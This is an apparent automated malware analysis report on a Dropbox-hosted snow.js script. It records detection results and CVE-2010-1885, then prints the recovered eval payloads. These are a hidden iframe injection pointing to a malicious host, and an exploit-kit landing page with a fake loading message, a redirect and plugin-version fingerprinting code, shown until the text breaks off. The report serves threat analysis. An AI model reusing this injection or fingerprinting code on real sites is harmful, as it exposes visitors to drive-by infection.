Analysis report for http://dl.dropbox.com/u/50989988/js/theme/snow.js
Sample Overview¶
| URL | http://dl.dropbox.com/u/50989988/js/theme/snow.js |
|---|---|
| Domain | dl.dropbox.com |
| Analysis Started | 2011-12-05 12:07:48 |
| Report Generated | 2011-12-05 12:08:21 |
| Jsand version | 2.3.1 |
See the report for domain dl.dropbox.com.
Detection results¶
| Detector | Result |
|---|---|
| Jsand 2.3.1 | malicious |
In particular, the following URL was found to contain malicious content:
- http://smerdiki5.comsunet.com/sett/main.php?page=a313553a42be5802
Exploits¶
| Name | Description | Reference |
|---|---|---|
| HPC URL | Windows Help and Support Center (hcp:// protocol handler) URL validation vulnerability | CVE-2010-1885 |
Deobfuscation results¶
Evals (code the sample passed to eval(), as recovered by the analyzer)
- (repeated 1 time)
/*
 * Analyst annotation (not part of the captured sample).
 *
 * Purpose: make the visitor's browser load the main.php URL below inside an
 * iframe that is not visible on the page.
 *
 * - If a <body> element already exists, iframer() builds the iframe through
 *   the DOM and appends it to that body. iframer is a function declaration,
 *   so the call that precedes its definition resolves through hoisting.
 * - Otherwise the same iframe is emitted as markup with document.write().
 * - Both paths use the same src and the same presentation: 10x10 size,
 *   visibility hidden, absolutely positioned at left 0 / top 0.
 *
 * Triage: the iframe src is the URL this report flags as malicious and the
 * next entry in its request log, so that host is the indicator to pivot on.
 * A hidden, fixed-size iframe to a third-party host, created by a script
 * served from a file-sharing domain, is the pattern worth alerting on.
 */
if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write(" <iframe src='http://smerdiki5.comsunet.com/sett/main.php?page=a313553a42be5802' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe'); f.setAttribute('src', 'http://smerdiki5.comsunet.com/sett/main.php?page=a313553a42be5802'); f.style.visibility = 'hidden'; f.style.position = 'absolute'; f.style.left = '0'; f.style.top = '0'; f.setAttribute('width', '10'); f.setAttribute('height', '10'); document.getElementsByTagName('body')[0].appendChild(f); }
- (repeated 1 time)
document.write('<center><h1>Please wait page is loading...</h1></center><hr>'); function end_redirect(){ window.location.href = 'http://pokler1.thailandclubinfo.com//index.php?7e0071740f50250645dcbdc868cb799b'; } var jver = [0, 0, 0, 0], pdfver = [0, 0, 0, 0], flashver = [0, 0, 0, 0]; try { var PluginDetect = { handler : function (c, b, a){ return function (){ c(b, a) } } , isDefined : function (b){ return typeof b != "undefined" } , isArray : function (b){ return (/array/i).test(Object.prototype.toString.call(b)) } , isFunc : function (b){ return typeof b == "function" } , isString : function (b){ return typeof b == "string" } , isNum : function (b){ return typeof b == "number" } , isStrNum : function (b){ return (typeof b == "string" && (/\d/).test(b)) } , getNumRegx :/ [ \ d][ \ d \ . \ _ ,- ] */, splitNumRegx :/ [ \ . \ _ ,- ] /g,getNum:function(b,c){var d=this,a=d.isStrNum(b)?(d.isDefined(c)?new RegExp(c):d.getNumR egx).exec(b):null;return a?a[0]:null},compareNums:function(h,f,d){var e=this,c,b,a,g=parse Int;if(e.isStrNum(h)&&e.isStrNum(f)){if(e.isDefined(d)&&d.compareNums){return d.compareNum s(h,f)}c=h.split(e.splitNumRegx);b=f.split(e.splitNumRegx);for(a=0;a<Math.min(c.length,b.l ength);a++){if(g(c[a],10)>g(b[a],10)){return 1}if(g(c[a],10)<g(b[a],10)){return -1}}}retur n 0},formatNum:function(b,c){var d=this,a,e;if(!d.isStrNum(b)){return null}if(!d.isNum(c)) {c=4}c--;e=b.replace(/ \ s /g,"").split(d.splitNumRegx).concat(["0","0","0","0"]);for(a=0;a<4;a++){if(/ ^ (0 + )(. 
+ )$/.test(e[a])){e[a]=RegExp.$2}if(a>c||!(/ \ d /).test(e[a])){e[a]="0"}}return e.slice(0,4).join(",")},$$hasMimeType:function(a){return f unction(d){if(!a.isIE&&d){var c,b,e,f=a.isString(d)?[d]:d;if(!f||!f.length){return null}fo r(e=0;e<f.length;e++){if(/[ ^\ s] /.test(f[e])&&(c=navigator.mimeTypes[f[e]])&&(b=c.enabledPlugin)&&(b.name||b.description)) {return c}}}return null}},findNavPlugin:function(l,e,c){var j=this,h=new RegExp(l,"i"),d=( !j.isDefined(e)||e)?/ \ d /:0,k=c?new RegExp(c,"i"):0,a=navigator.plugins,g="",f,b,m;for(f=0;f<a.length;f++){m=a[f]. description||g;b=a[f].name||g;if((h.test(m)&&(!d||d.test(RegExp.leftContext+RegExp.rightCo ntext)))||(h.test(b)&&(!d||d.test(RegExp.leftContext+RegExp.rightContext)))){if(!k||!(k.te st(m)||k.test(b))){return a[f]}}}return null},getMimeEnabledPlugin:function(a,f){var e=thi s,b,c=new RegExp(f,"i"),d="";if((b=e.hasMimeType(a))&&(b=b.enabledPlugin)&&(c.test(b.descr iption||d)||c.test(b.name||d))){return b}return 0},getPluginFileVersion:function(f,b){var h=this,e,d,g,a,c=-1;if(h.OS>2||!f||!f.version||!(e=h.getNum(f.version))){return b}if(!b){r eturn e}e=h.formatNum(e);b=h.formatNum(b);d=b.split(h.splitNumRegx);g=e.split(h.splitNumRe gx);for(a=0;a<d.length;a++){if(c>-1&&a>c&&d[a]!="0"){return b}if(g[a]!=d[a]){if(c==-1){c=a }if(d[a]!="0"){return b}}}return e},AXO:window.ActiveXObject,getAXO:function(b){var f=null ,d,c=this,a;try{f=new c.AXO(b)}catch(d){}return f},convertFuncs:function(g){var a,h,f,b=/ ^ [$][$] /,d={},c=this;for(a in g){if(b.test(a)){d[a]=1}}for(a in d){try{h=a.slice(2);if(h.length>0 &&!g[h]){g[h]=g[a](g);delete g[a]}}catch(f){}}},initScript:function(){var c=this,a=navigat or,e="/",i=a.userAgent||"",g=a.vendor||"",b=a.platform||"",h=a.product||" ";c.OS=100;if(b){var f,d=["Win",1,"Mac",2,"Linux",3,"FreeBSD",4,"iPhone",21.1,"iPod ",21.2,"iPad",21.3,"Win. * CE",22.1,"Win. 
* Mobile",22.2,"Pocket \ s * PC",22.3," ",100];for(f=d.length-2;f>=0;f=f-2){if(d[f]&&new RegExp(d[f],"i ").test(b)){c.OS=d[f+1];break}}}c.convertFuncs(c);c.isIE=new Function("return "+e+" * @cc_on!@ * "+e+"false" )();c.verIE=c.isIE&&(/MSIE\s*(\d+\.?\d*)/i).test(i)?parseFloat(RegExp.$1,10):null;c.Active XEnabled=false;if(c.isIE){var f,j=["Msxml2.XMLHTTP","Msxml2.DOMDocument","Microsoft.XMLDOM ","ShockwaveFlash.ShockwaveFlash","TDCCtl.TDCCtl","Shell.UIHelper","Scripting. Dictionary","wmplayer.ocx" ];for(f=0;f<j.length;f++){if(c.getAXO(j[f])){c.ActiveXEnabled=true;break}}c.head=c.isDefin ed(document.getElementsByTagName)?document.getElementsByTagName("head" )[0]:null}c.isGecko=(/Gecko/i).test(h)&&(/Gecko\s*\/\s*\d/i).test(i);c.verGecko=c.isGecko? c.formatNum((/rv\s*\:\s*([\.\,\d]+)/i).test(i)?RegExp.$1:"0.9" ):null;c.isSafari=(/Safari\s*\/\s*\d/i).test(i)&&(/Apple/i).test(g);c.isChrome=(/Chrome\s* \/\s*(\d[\d\.]*)/i).test(i);c.verChrome=c.isChrome?c.formatNum(RegExp.$1):null;c.isOpera=( /Opera\s*[\/]?\s*(\d+\.?\d*)/i).test(i);c.verOpera=c.isOpera&&((/Version\s*\/\s*(\d+\.?\d* )/i).test(i)||1)?parseFloat(RegExp.$1,10):null;c.addWinEvent("load" ,c.handler(c.runWLfuncs,c))},init:function(c){var b=this,a,c;if(!b.isString(c)){return -3} if(c.length==1){b.getVersionDelimiter=c;return -3}c=c.toLowerCase().replace(/\s/g,"" );a=b[c];if(!a||!a.getVersion){return -3}b.plugin=a;if(!b.isDefined(a.installed)){a.instal led=a.version=a.version0=a.getVersionDone=null;a.$=b;a.pluginName=c}b.garbage=false;if(b.i sIE&&!b.ActiveXEnabled){if(a!==b.java){return -2}}return 1},fPush:function(b,a){var c=this ;if(c.isArray(a)&&(c.isFunc(b)||(c.isArray(b)&&b.length>0&&c.isFunc(b[0])))){a.push(b)}},c allArray:function(b){var c=this,a;if(c.isArray(b)){for(a=0;a<b.length;a++){if(b[a]===null) {return}c.call(b[a]);b[a]=null}}},call:function(c){var b=this,a=b.isArray(c)?c.length:-1;i f(a>0&&b['isFunc'](c[0])){c[0](b,a>1?c[1]:0,a>2?c[2]:0,a>3?c[3]:0)}else{if(b.isFunc(c)){c( b)}}},getVersionDelimiter:", 
" ,$$getVersion:function(a){return function(g,d,c){var e=a.init(g),f,b,h;if(e<0){return null };f=a.plugin;if(f.getVersionDone!=1){f.getVersion(null,d,c);if(f.getVersionDone===null){f. getVersionDone=1}}a.cleanup();b=(f.version||f.version0);b=b?b.replace(a.splitNumRegx,a.get VersionDelimiter):b;return b}},cleanup: function(){var a=this;if(a.garbage&&a.isDefined(wi ndow.CollectGarbage)){window.CollectGarbage()}},addWinEvent:function(d,c){var e=this,a=win dow,b;if(e.isFunc(c)){if(a.addEventListener){a.addEventListener(d,c,false)}else{if(a.attac hEvent){a.attachEvent("on"+d,c)}else{b=a["on"+d];a["on "+d]=e.winHandler(c,b)}}}},winHandler:function(d,c){return function(){d();if(typeof c==" function " ){c()}}},WLfuncs0:[],WLfuncs:[],runWLfuncs:function(a){a.winLoaded=true;a.callArray(a.WLfu ncs0);a.callArray(a.WLfuncs);if(a.onDoneEmptyDiv){a.onDoneEmptyDiv()}},winLoaded:false,$$o nWindowLoaded:function(a){return function(b){if(a.winLoaded){a.call(b)}else{a.fPush(b,a.WL funcs)}}},$$onDetectionDone:function(a){return function(h,g,c,b){var d=a.init(h),j,e;if(d= =-3){return -1}e=a.plugin;if(!a.isArray(e.funcs)){e.funcs=[]}if(e.getVersionDone!=1){j=a.i sMinVersion?a.isMinVersion(h,"0" ,c,b):a.getVersion(h,c,b)}if(e.installed!=-0.5&&e.installed!=0.5){a.call(g);return 1}if(e. 
NOTF){a.fPush(g,e.funcs);return 0}return 1}},div:null,divWidth:50,pluginSize:1,emptyDiv:fu nction(){var c=this,a,e,b,d=0;if(c.div&&c.div.childNodes){for(a=c.div.childNodes.length-1; a>=0;a--){b=c.div.childNodes[a];if(b&&b.childNodes){if(d==0){for(e=b.childNodes.length-1;e >=0;e--){b.removeChild(b.childNodes[e])}c.div.removeChild(b)}else{}}}}},DONEfuncs:[],onDon eEmptyDiv:function(){var c=this,a,b;if(!c.winLoaded){return}if(c.WLfuncs&&c.WLfuncs.length &&c.WLfuncs[c.WLfuncs.length-1]!==null){return}for(a in c){b=c[a];if(b&&b.funcs){if(b.OTF= =3){return}if(b.funcs.length&&b.funcs[b.funcs.length-1]!==null){return}}}for(a=0;a<c.DONEf uncs.length;a++){c.callArray(c.DONEfuncs)}c.emptyDiv()},getWidth:function(c){if(c){var a=c .scrollWidth||c.offsetWidth,b=this;if(b.isNum(a)){return a}}return -1},getTagStatus:functi on(m,g,a,b){var c=this,f,k=m.span,l=c.getWidth(k),h=a.span,j=c.getWidth(h),d=g.span,i=c.ge tWidth(d);if(!k||!h||!d||!c.getDOMobj(m)){return -2}if(j<i||l<0||j<0||i<0||!(i>c.pluginSiz e)||c.pluginSize<1){return 0}if(l>=i){return -1}try{if(l==c.pluginSize&&(!c.isIE||c.getDOM obj(m).readyState==4)){if(!m.winLoaded&&c.winLoaded){return 1}if(m.winLoaded&&c.isNum(b)){ if(!c.isNum(m.count)){m.count=b}if(b-m.count>=10){return 1}}}}catch(f){}return 0},getDOMob j:function(g,a){var f,d=this,c=g?g.span:0,b=c&&c.firstChild?1:0;try{if(b&&a){c.firstChild. 
focus()}}catch(f){}return b?c.firstChild:null},setStyle:function(b,g){var f=b.style,a,d,c= this;if(f&&g){for(a=0;a<g.length;a=a+2){try{f[g[a]]=g[a+1]}catch(d){}}}},insertDivInBody:f unction(i){var g,d=this,h="pd33993399",c=null,f=document,b=" < ",a=(f.getElementsByTagName("body")[0]||f.body);if(!a){try{f.write(b+'div id="'+h+' ">o'+b+" /div>");c=f.getElementById(h)}catch(g){}}a=(f.getElementsByTagName("body")[0]||f.body);if( a){if(a.firstChild&&d.isDefined(a.insertBefore)){a.insertBefore(i,a.firstChild)}else{a.app endChild(i)}if(c){a.removeChild(c)}}else{}},insertHTML:function(g,b,h,a,k){var l,m=documen t,j=this,q,o=m.createElement("span"),n,i,f="<";var c=["outlineStyle","none","borderStyle", "none","padding","0px","margin","0px","visibility","visible"];if(!j.isDefined(a)){a=""}if( j.isString(g)&&(/[ ^\ s] /).test(g)){q=f+g+' width="'+j.pluginSize+'" height="'+j.pluginSize+'" ';for(n=0;n<b.lengt h;n=n+2){if(/[ ^\ s] /.test(b[n+1])){q+=b[n]+'="'+b[n+1]+'" '}}q+=">";for(n=0;n<h.length;n=n+2){if(/[ ^\ s] /.test(h[n+1])){q+=f+'param name="'+h[n]+'" value="'+h[n+1]+'" / > ' }}q+=a+f+"/"+g+">"}else{q=a}if(!j.div){j.div=m.createElement("div");i=m.getElementById("pl ugindetect");if(i){j.div=i}else{j.div.id="plugindetect";j.insertDivInBody(j.div)}j.setStyl e(j.div,c.concat(["width",j.divWidth+"px","height",(j.pluginSize+3)+"px","fontSize",(j.plu ginSize+3)+"px","lineHeight",(j.pluginSize+3)+"px","verticalAlign","baseline","display","b lock"]));if(!i){j.setStyle(j.div,["position","absolute","right","0px","top","0px"])}}if(j. 
div&&j.div.parentNode){j.div.appendChild(o);j.setStyle(o,c.concat(["fontSize",(j.pluginSiz e+3)+"px","lineHeight",(j.pluginSize+3)+"px","verticalAlign","baseline","display","inline" ]));try{if(o&&o.parentNode){o.focus()}}catch(l){}try{o.innerHTML=q}catch(l){}if(o.childNod es.length==1&&(j.isGecko&&j.compareNums(j.verGecko,"1"+",5,0,0")>=0)){j.setStyle(o.firstCh ild,c.concat(["display","inline"]))}return{span:o,winLoaded:j.winLoaded,tagName:(j.isStrin g(g)?g:"")}}return{span:null,winLoaded:j.winLoaded,tagName:""}},java:{mimeType:["applicati on/x-java-applet","application/x-java-vm","application/x-java-bean"],mimeTypeJPI:"applicat ion/x-java-applet;jpi-version=",classID:"clsid:8AD9C840-044E-11D1-B3E9-00805F499D93",DTKcl assID:"clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA",DTKmimeType:["application/java-deployme nt-toolkit","application/npruntime-scriptable-plugin;DeploymentToolkit"],forceVerifyTag:[] ,jar:[],Enabled:navigator.javaEnabled(),VENDORS:["Sun Microsystems Inc.","Apple Computer, Inc."],OTF:null,All_versions:[],mimeTypeJPIresult:"",JavaPlugin_versions:[],JavaVersions:[ [1,9,2,30],[1,8,2,30],[1,7,2,30],[1,6,1,30],[1,5,1,30],[1,4,2,30],[1,3,1,30]],searchJavaPl uginAXO:function(){var h=null,a=this,c=a.$,g=[],j=[1,5,0,14],i=[1,6,0,2],f=[1,3,1,0],e=[1, 4,2,0],d=[1,5,0,7],b=false;if(!c.ActiveXEnabled){return null};if(c.verIE>=a.minIEver){g=a. searchJavaAXO(i,i,b);if(g.length>0&&b){g=a.searchJavaAXO(j,j,b)}}else{if(g.length==0){g=a. 
searchJavaAXO(f,e,false)}}if(g.length>0){h=g[0]}a.JavaPlugin_versions=[].concat(g);return h},searchJavaAXO:function(l,i,m){var n,f,h=this.$,q,k,a,e,g,j,b,r=[];if(h.compareNums(l.jo in(","),i.join(","))>0){i=l}i=h.formatNum(i.join(","));var o,d="1,4,2,0",c="JavaPlugin."+l [0]+""+l[1]+""+l[2]+""+(l[3]>0?("_"+(l[3]<10?"0":"")+l[3]):"");for(n=0;n<this.JavaVersions .length;n++){f=this.JavaVersions[n];q="JavaPlugin."+f[0]+""+f[1];g=f[0]+"."+f[1]+".";for(a =f[2];a>=0;a--){b="JavaWebStart.isInstalled."+g+a+".0";if(h.compareNums(f[0]+","+f[1]+","+ a+",0",i)>=0&&!h.getAXO(b)){continue}o=h.compareNums(f[0]+","+f[1]+","+a+",0",d)<0?true:fa lse;for(e=f[3];e>=0;e--){k=a+"_"+(e<10?"0"+e:e);j=q+k;if(h.getAXO(j)&&(o||h.getAXO(b))){r. push(g+k);if(!m){return r}}if(j==c){return r}}if(h.getAXO(q+a)&&(o||h.getAXO(b))){r.push(g +a);if(!m){return r}}if(q+a==c){return r}}}return r},minIEver:7,getMimeJPIversion:function (){var h,a=this,d=a.$,c=new RegExp("("+a.mimeTypeJPI+")(\d.*)","i"),k=new RegExp("Java","i "),e,j,f="",i={},g=0,b;for(h=0;h<navigator.mimeTypes.length;h++){j=navigator.mimeTypes[h]; if(c.test(j.type)&&(e=j.enabledPlugin)&&(j=RegExp.$2)&&(k.test(e.description||f)||k.test(e .name||f))){i["a"+d.formatNum(j)]=j}}b="0,0,0,0";for(h in i){g++;e=h.slice(1);if(d.compare Nums(e,b)>0){b=e}}a.mimeTypeJPIresult=g>0?a.mimeTypeJPI+i["a"+b]:"";return g>0?b:null},get Version:function(m,d,l){var f,c=this,e=c.$,h=c.NOTF,b=c.applet,j=c.verify,i=vendor=version Enabled=null;if(c.getVersionDone===null){c.OTF=0;c.mimeObj=e.hasMimeType(c.mimeType);c.dep loyTK.$=e;c.deployTK.parentNode=c;b.$=e;b.parentNode=c;if(h){h.$=e;h.parentNode=c}if(j){j. 
parentNode=c;j.$=e;j.init()}}var k;if(e.isArray(l)){for(k=0;k<b.allowed.length;k++){if(e.i sNum(l[k])){b.allowed[k]=l[k]}}}for(k=0;k<c.forceVerifyTag.length;k++){b.allowed[k]=c.forc eVerifyTag[k]}if(e.isString(d)){c.jar.push(d)}if(c.getVersionDone==0){if(!c.version||b.can TryAny()){f=b.insertHTMLQueryAll(d);if(f[0]){c.installed=1;c.EndGetVersion(f[0],f[1])}}ret urn}var g=c.deployTK.query();if(g.JRE){i=g.JRE;vendor=c.VENDORS[0]}if(!e.isIE){var q,n,a,o ;o=(c.mimeObj&&c.Enabled)?true:false;if(!i&&(f=c.getMimeJPIversion())!==null){i=f}if(!i&&c .mimeObj){f="Java[^\d]*Plug-in";a=e.findNavPlugin(f);if(a){f=new RegExp(f,"i");q=f.test(a. description||"")?e.getNum(a.description):null;n=f.test(a.name||"")?e.getNum(a.name):null;i f(q&&n){i=(e.compareNums(e.formatNum(q),e.formatNum(n))>=0)?q:n}else{i=q||n}}}if(!i&&c.mim eObj&&e.isSafari&&e.OS==2){a=e.findNavPlugin("Java.*\d.*Plug-in.*Cocoa",0);if(a){q=e.getNu m(a.description);if(q){i=q}}}if(i){c.version0=i;if(c.Enabled){versionEnabled=i}}}else{if(! i&&g.status==0){i=c.searchJavaPluginAXO();if(i){vendor=c.VENDORS[0]}}if(i){c.version0=i;if (c.Enabled&&e.ActiveXEnabled){versionEnabled=i}}}if(!versionEnabled||b.canTryAny()){f=b.in sertHTMLQueryAll(d);if(f[0]){versionEnabled=f[0];vendor=f[1]}}if(!versionEnabled&&(f=c.que ryWithoutApplets())[0]){c.version0=versionEnabled=f[0];vendor=f[1];if(c.installed==-0.5){c .installed=0.5}}if(e.isSafari&&e.OS==2){if(!versionEnabled&&o){if(c.installed===null){c.in stalled=0}else{if(c.installed==-0.5){c.installed=0.5}}}}if(c.jreDisabled()){versionEnabled =null};if(c.installed===null){c.installed=versionEnabled?1:(i?-0.2:-1)}c.EndGetVersion(ver sionEnabled,vendor)},EndGetVersion:function(b,d){var a=this,c=a.$;if(a.version0){a.version 0=c.formatNum(c.getNum(a.version0))}if(b){a.version=c.formatNum(c.getNum(b));a.vendor=(c.i sString(d)?d:"")}if(a.getVersionDone!=1){a.getVersionDone=0}},jreDisabled:function(){var b 
=this,d=b.$,c=b.deployTK.query().JRE,a;if(c&&d.OS==1){if((d.isGecko&&d.compareNums(d.verGe cko,"1,9,2,0")>=0&&d.compareNums(c,"1,6,0,12")<0)||(d.isChrome&&d.compareNums(c,"1,6,0,12" )<0)){return 1}};if(d.isOpera&&d.verOpera>=9&&!b.Enabled&&!b.mimeObj&&!b.queryWithoutApple ts()[0]){return 1}if((d.isGecko||d.isChrome)&&!b.mimeObj&&!b.queryWithoutApplets()[0]){ret urn 1}return 0},deployTK:{status:null,JREall:[],JRE:null,HTML:null,query:function(){var f= this,h=f.$,c=f.parentNode,i,a,b,g=len=null;if(f.status!==null){return f}f.status=0;if(!(h. isGecko&&h.compareNums(h.verGecko,h.formatNum("1.6"))>=1)||h.isSafari||h.isChrome||(h.isIE &&!h.ActiveXEnabled)){return f}if(h.isIE&&h.verIE>=6){f.HTML=h.insertHTML("object",[],[]); g=h.getDOMobj(f.HTML)}else{if(!h.isIE&&(b=h.hasMimeType(c.DTKmimeType))&&b.type){f.HTML=h. insertHTML("object",["type",b.type],[]);g=h.getDOMobj(f.HTML)}}if(g){if(h.isIE&&h.verIE>=6 ){try{g.classid=c.DTKclassID}catch(i){}};try{var d=g.jvms;if(d){len=d.getLength();if(h.isN um(len)){f.status=len>0?1:-1;for(a=0;a<len;a++){b=h.getNum(d.get(len-1-a).version);if(b){f .JREall[a]=b}}}}}catch(i){}}if(f.JREall.length>0){f.JRE=h.formatNum(f.JREall[0])}return f} },queryWithoutApplets00:function(c,a){var b=window.java,d;try{if(b&&b.lang&&b.lang.System) {a.value=[b.lang.System.getProperty("java.version")+" ",b.lang.System.getProperty("java.ve ndor")+" "]}}catch(d){}},queryWithoutApplets:function(){var c=this,f=c.$,g,a=c.queryWithou tApplets;if(!a.value){a.value=[null,null];if(!f.isIE&&window.java){if(f.OS==2&&f.isOpera&& (f.verOpera<9.2)&&f.verOpera>=9){}else{if(f.isGecko&&f.compareNums(f.verGecko,"1,9,0,0")<0 &&f.compareNums(f.verGecko,"1,8,0,0")>=0){}else{if(f.isGecko){var i,b,h=document;if(h.crea teElement&&h.createEvent){try{i=h.createElement("div"),b=h.createEvent("HTMLEvents");b.ini tEvent("change",false,false);i.addEventListener("change",f.handler(c.queryWithoutApplets00 ,f,a),false);i.dispatchEvent(b)}catch(g){}}}else{c.queryWithoutApplets00(f,a)}}}}}return 
a .value},applet:{results:[[null,null],[null,null],[null,null]],HTML:[0,0,0],active:[0,0,0], allowed:[2,2,2],DummyObjTagHTML:0,DummySpanTagHTML:0,getResult:function(){var c=this.resul ts,a,b;for(a=0;a<c.length;a++){b=c[a];if(b[0]){break}}return[].concat(b)},canTry:function( d){var b=this,c=b.$,a=b.parentNode;if(b.allowed[d]==3){return true}if(!a.version0||!a.Enab led||(c.isIE&&!c.ActiveXEnabled)){if(b.allowed[d]==2){return true}if(b.allowed[d]==1&&!b.g etResult()[0]){return true}}return false},canTryAny:function(){var b=this,a;for(a=0;a<b.al lowed.length;a++){if(b.canTry(a)){return true}}return false},canUseAppletTag:function(){va r b=this,c=b.$,a=b.parentNode;return(!c.isIE||a.Enabled)},canUseObjectTag:function(){var a =this,b=a.$;return(!b.isIE||b.ActiveXEnabled)},queryThis:function(h){var g,c=this,b=c.pare ntNode,f=b.$,a=vendor=null,d=f.getDOMobj(c.HTML[h],true);if(d){try{a=d.getVersion()+" ";ve ndor=d.getVendor()+" ";d.statusbar(f.winLoaded?" ":" ")}catch(g){}if(f.isStrNum(a)){c.resu lts[h]=[a,vendor]}try{if(f.isIE&&a&&d.readyState!=4){f.garbage=true;d.parentNode.removeChi ld(d)}}catch(g){}}},insertHTMLQueryAll:function(e){var g=this,n=g.parentNode,d=n.$,o=g.res ults,q=g.HTML,h=" ",u="A.class";if(!d.isString(e)||!(/\.jar\s*$/).t est(e)||(/\\/).test(e)){return[null,null]}if(n.OTF<1){n.OTF=1}if(n.jreDisabled()){return[n ull,null]}if(n.OTF<2){n.OTF=2}var c=e,t="",m;if((/[\/]/).test(e)){m=e.split("/");c=m[m.len gth-1];m[m.length-1]="";t=m.join("/")}var j=["archive",c,"code",u],l=["mayscript","true"], r=["scriptable","true"].concat(l),f=!d.isIE&&n.mimeObj&&n.mimeObj.type?n.mimeObj.type:n.mi meType[0];if(!q[0]&&g.canUseObjectTag()&&g.canTry(0)){q[0]=d.isIE?d.insertHTML("object",[" type",f].concat(j),["codebase",t].concat(j).concat(r),h,n):d.insertHTML("object",["type",f ,"archive",c,"classid","java:"+u],["codebase",t,"archive",c].concat(r),h,n);o[0]=[0,0];g.q ueryThis(0)}if(!q[1]&&g.canUseAppletTag()&&g.canTry(1)){q[1]=d.isIE?d.insertHTML("applet", 
["alt",h].concat(l).concat(j),["codebase",t].concat(l),h,n):d.insertHTML("applet",["codeba se",t,"alt",h].concat(l).concat(j),[].concat(l),h,n);o[1]=[0,0];g.queryThis(1)}if(!q[2]&&g .canUseObjectTag()&&g.canTry(2)){q[2]=d.isIE?d.insertHTML("object",["classid",n.classID],[ "codebase",t].concat(j).concat(r),h,n):d.insertHTML();o[2]=[0,0];g.queryThis(2)}if(!g.Dumm yObjTagHTML&&g.canUseObjectTag()){g.DummyObjTagHTML=d.insertHTML("object",[],[],h)}if(!g.D ummySpanTagHTML){g.DummySpanTagHTML=d.insertHTML("",[],[],h)};if(n.OTF<=2&&((q[0]&&!o[0][0 ])||(q[1]&&!o[1][0])||(d.isIE&&q[2]&&!o[2][0]))){var i=n.NOTF,b=i.isJavaActive();if(b>=0){ n.OTF=3;n.installed=b==1?0.5:-0.5;i.onIntervalQuery=d.handler(i.$$onIntervalQuery,i);if(!d .winLoaded){d.WLfuncs0.push([i.winOnLoadQuery,i])}setTimeout(i.onIntervalQuery,i.intervalL ength)}};var k,a=0;for(k=0;k<o.length;k++){if(q[k]||g.canTry(k)){a++}else{break}}if(a==o.l ength){n.getVersionDone=n.forceVerifyTag.length>0?0:1}return g.getResult()}},NOTF:{count:0 ,countMax:25,intervalLength:250,isJavaActive:function(){var e=this,c=e.parentNode,a,b,d=-9 ;for(a=0;a<c.applet.HTML.length;a++){b=e.isAppletActive(a);c.applet.active[a]=b;if(b>d){d= b}}return d},isAppletActive:function(g){var h=this,d=h.$,c=h.parentNode,b=c.applet,f,a=d.g etTagStatus(b.HTML[g],b.DummySpanTagHTML,b.DummyObjTagHTML,h.count);if(a==-2){return -2}tr y{if(d.isIE&&d.verIE>=c.minIEver&&d.getDOMobj(b.HTML[g]).object){return 1}}catch(f){}if(a= =1&&(d.isIE||((c.version0&&c.Enabled&&c.Enabled)||c.queryWithoutApplets()[0]))){return 1}i f(a<0){return -1}return 0},winOnLoadQuery:function(c,d){var b=d.parentNode,a;if(b.OTF==3){ a=d.queryAllApplets();d.queryCompleted(a[1],a[2])}},$$onIntervalQuery:function(d){var c=d. 
$,b=d.parentNode,a;if(b.OTF==3){a=d.queryAllApplets();if(a[0]||(c.winLoaded&&d.count>d.cou ntMax)){d.queryCompleted(a[1],a[2])}}d.count++;if(b.OTF==3){setTimeout(d.onIntervalQuery,d .intervalLength)}},queryAllApplets:function(){var g=this,f=g.$,e=g.parentNode,d=e.applet,b ,a,c;for(b=0;b<d.results.length;b++){d.queryThis(b)}a=d.getResult();c=(a[0]||g.isJavaActiv e()<0)?true:false;return[c,a[0],a[1]]},queryCompleted:function(c,f){var e=this,d=e.$,b=e.p arentNode;if(b.OTF==4){return}b.OTF=4;var a=e.isJavaActive()==1?true:false;if(c||b.queryWi thoutApplets()[0]){b.installed=1}else{if(a){if(b.version0){b.installed=1;c=b.version0}else {b.installed=0}}else{if(b.installed==0.5){b.installed=0}else{if(b.version0){b.installed=-0 .2}else{b.installed=-1}}}}b.EndGetVersion(c,f);if(b.funcs){d.callArray(b.funcs)}if(d.onDon eEmptyDiv){d.onDoneEmptyDiv()}}},append:function(e,d){for(var c=0;c<d.length;c++){e.push(d [c])}},JavaFix:function(){}},flash:{mimeType:["application/x-shockwave-flash","application /futuresplash"],progID:"ShockwaveFlash.ShockwaveFlash",classID:"clsid:D27CDB6E-AE6D-11CF-9 6B8-444553540000",getVersion:function(){var b=function(i){if(!i){return null}var e=/[\d][\ d\,\.\s]*[rRdD]{0,1}[\d\,]*/.exec(i);return e?e[0].replace(/[rRdD\.]/g,",").replace(/\s/g, ""):null};var d,h=this,f=h.$,j,g,k=null,c=null,a=null;if(!f.isIE){d=f.findNavPlugin("Flash ");if(d&&d.description&&f.hasMimeType(h.mimeType)){k=b(d.description)}if(k){k=f.getPluginF ileVersion(d,k)}}else{for(g=15;g>2;g--){c=f.getAXO(h.progID+"."+g);if(c){a=g.toString();br eak}}if(a=="6"){try{c.AllowScriptAccess="always"}catch(j){return"6,0,21,0"}}try{k=b(c.GetV ariable(""))}catch(j){}if(!k&&a){k=a}}h.installed=k?1:-1;h.version=f.formatNum(k);return t rue}},adobereader:{mimeType:"application/pdf",navPluginObj:null,progID:["AcroPDF.PDF","PDF .PdfCtrl"],classID:"clsid:CA8A9780-280D-11CF-A24D-444553540000",INSTALLED:{},pluginHasMime Type:function(d,c,f){var b=this,e=b.$,a;for(a in 
d){if(d[a]&&d[a].type&&d[a].type==c){retu rn 1}}if(e.getMimeEnabledPlugin(c,f)){return 1}return 0},getVersion:function(i,j){var f=th is,c=f.$,h,d,k,m=p=null,g=null,l=null,a,b;j=(c.isString(j)&&j.length)?j.replace(/\s/,"").t oLowerCase():f.mimeType;if(c.isDefined(f.INSTALLED[j])){f.installed=f.INSTALLED[j];return} if(!c.isIE){a="Adobe.*PDF.*Plug-?in|Adobe.*Acrobat.*Plug-?in|Adobe.*Reader.*Plug-?in";if(f .getVersionDone!==0){f.getVersionDone=0;p=c.getMimeEnabledPlugin(f.mimeType,a);if(!p&&c.ha sMimeType(f.mimeType)){p=c.findNavPlugin(a,0)}if(p){f.navPluginObj=p;g=c.getNum(p.descript ion)||c.getNum(p.name);g=c.getPluginFileVersion(p,g);if(!g&&c.OS==1){if(f.pluginHasMimeTyp e(p,"application/vnd.adobe.pdfxml",a)){g="9"}else{if(f.pluginHasMimeType(p,"application/vn 